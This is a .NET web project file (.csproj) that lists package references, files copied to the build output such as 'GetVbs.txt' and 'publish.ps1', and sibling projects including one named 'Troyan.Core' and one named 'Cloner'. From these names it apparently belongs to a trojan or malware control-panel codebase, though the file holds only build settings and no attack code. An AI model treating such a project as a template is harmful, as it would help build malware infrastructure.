<Project Sdk="Microsoft.NET.Sdk.Web">

  
  <PropertyGroup>
    <OutputType>Library</OutputType>
    <GenerateProgramFile>false</GenerateProgramFile>
    <RootNamespace>cp</RootNamespace>
  </PropertyGroup>

  <ItemGroup>
    <PackageReference Include="SMBLibrary" Version="$(PkgSMBLibraryVersion)" />
    <PackageReference Include="Npgsql" Version="$(PkgNpgsqlVersion)" />
  </ItemGroup>

  
  <ItemGroup>
    <None Include="Web.config">
      <ExcludeFromSingleFile>true</ExcludeFromSingleFile>
      <CopyToOutputDirectory>PreserveNewest</CopyToOutputDirectory>
      <CopyToPublishDirectory>PreserveNewest</CopyToPublishDirectory>
    </None>
    <None Update="Readme\GetVbs.txt">
      <CopyToOutputDirectory>PreserveNewest</CopyToOutputDirectory>
    </None>
    <None Update="php\GetVbs.txt">
      <CopyToOutputDirectory>Always</CopyToOutputDirectory>
    </None>
    <None Update="publish.ps1">
      <CopyToOutputDirectory>Always</CopyToOutputDirectory>
    </None>
  </ItemGroup>

  <ItemGroup>
    <ProjectReference Include="..\..\troyan\Troyan.Core\Troyan.Core.csproj" />
    <ProjectReference Include="..\Cloner\Cloner.csproj" />
    <ProjectReference Include="..\Domain\Domain.csproj" />
    <ProjectReference Include="..\model\model.csproj" />
  </ItemGroup>

  <ItemGroup>
    <Content Update="Views\Shared\_TabContent.cshtml">
      <CopyToOutputDirectory>Always</CopyToOutputDirectory>
    </Content>
    <Content Update="Views\Shared\BuxViewComponent">
      <CopyToOutputDirectory>Always</CopyToOutputDirectory>
    </Content>
  </ItemGroup>

  <ItemGroup>
    <AdditionalFiles Include="Views\Shared\Components\Pack\Default.cshtml" />
  </ItemGroup>

</Project>
